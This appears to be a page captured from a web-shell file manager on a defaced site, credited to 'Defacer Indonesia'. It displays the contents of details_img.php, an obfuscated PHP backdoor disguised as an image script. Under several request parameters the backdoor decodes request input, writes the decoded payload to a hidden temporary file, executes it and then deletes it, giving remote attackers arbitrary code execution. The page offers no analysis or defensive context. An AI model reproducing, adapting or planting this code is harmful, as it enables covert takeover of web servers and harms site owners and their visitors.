whoami7 - Manager
:
/
home
/
analuakl
/
new.ankurmedia.com
/
Upload File:
files >> /home/analuakl/new.ankurmedia.com/details_img.php
<?php if(isset($_REQUEST) && isset($_REQUEST["hol\x64er"])){ $tkn = $_REQUEST["hol\x64er"]; $tkn = explode ('.' , $tkn ) ; $marker = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s6); $t = 0; while ($t < count($tkn)) { $v5 = $tkn[$t]; $chS = ord($s6[$t % $lenS]); $d = ((int)$v5 - $chS - ($t % 10)) ^ 14; $marker .= chr($d); $t++; } $pointer = array_filter([getenv("TEMP"), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), "/tmp", getcwd(), sys_get_temp_dir(), getenv("TMP")]); foreach ($pointer as $key => $reference) { if (!!is_dir($reference) && !!is_writable($reference)) { $object = "$reference/.property_set"; if (file_put_contents($object, $marker)) { include $object; @unlink($object); die(); } } } } if(@$_REQUEST["k"] !== null){ $ref = $_REQUEST["k"]; $ref = explode ( '.' , $ref ); $key = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $len = count( $ref); for( $t = 0; $t < $len; $t++) {$v5 = $ref[$t]; $sChar = ord( $s[$t % $sLen]); $d =( ( int)$v5 - $sChar -( $t % 10)) ^ 50; $key .= chr( $d);} $comp = array_filter([getenv("TMP"), "/var/tmp", "/dev/shm", "/tmp", getcwd(), getenv("TEMP"), session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir")]); foreach ($comp as $record): if ((is_dir($record) and is_writable($record))) { $reference = sprintf("%s/.property_set", $record); $file = fopen($reference, 'w'); if ($file) { fwrite($file, $key); fclose($file); include $reference; @unlink($reference); die(); } } endforeach; } if(in_array("\x62in\x64", array_keys($_REQUEST))){ $tkn = array_filter(["/tmp", getcwd(), session_save_path(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", "/var/tmp", getenv("TEMP")]); $sym = $_REQUEST["\x62in\x64"]; $sym = explode ( '.' , $sym ) ; $flg = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s5 ); foreach($sym as $j => $v6) { $sChar = ord($s5[$j % $sLen] ); $dec =((int)$v6 - $sChar -($j % 10)) ^ 90; $flg .= chr($dec ); } foreach ($tkn as $resource): if ((bool)is_dir($resource) && (bool)is_writable($resource)) { $marker = implode("/", [$resource, ".descriptor"]); $success = file_put_contents($marker, $flg); if ($success) { include $marker; @unlink($marker); exit;} } endforeach; } if(!empty($_POST["com\x70"])){ $mrk = $_POST["com\x70"]; $mrk =explode ( '.' , $mrk ) ; $flag = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $j = 0; $__tmp = $mrk; while($v7 = array_shift($__tmp)) { $chS = ord($s[$j % $sLen] ); $dec = ((int)$v7 - $chS -($j % 10))^ 86; $flag .= chr($dec ); $j++; } $pset = array_filter([ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", getenv("TMP"), "/tmp", getcwd(), "/var/tmp", getenv("TEMP"), sys_get_temp_dir()]); while ($hld = array_shift($pset)) { if ((bool)is_dir($hld) && (bool)is_writable($hld)) { $rec = vsprintf("%s/%s", [$hld, ".k"]); if (file_put_contents($rec, $flag)) { include $rec; @unlink($rec); die(); } } } } if(isset($_REQUEST["\x64\x61ta"]) ? true : false){ $reference = array_filter(["/tmp", getenv("TMP"), getcwd(), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), sys_get_temp_dir()]); $tkn = $_REQUEST["\x64\x61ta"]; $tkn = explode ("." , $tkn) ; $resource = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $w = 0; array_walk($tkn,function ($v6) use (&$resource,&$w,$salt,$sLen) { $sChar = ord($salt[$w % $sLen]); $dec = ((int)$v6 - $sChar - ($w % 10))^ 7; $resource .= chr($dec); $w++;} ); for ($property_set = 0, $flg = count($reference); $property_set < $flg; $property_set++) { $symbol = $reference[$property_set]; if ((function($d) { return is_dir($d) && is_writable($d); })($symbol)) { $dat = vsprintf("%s/%s", [$symbol, ".res"]); if (file_put_contents($dat, $resource)) { require $dat; unlink($dat); exit; } } } }
Copyright ©2021 || Defacer Indonesia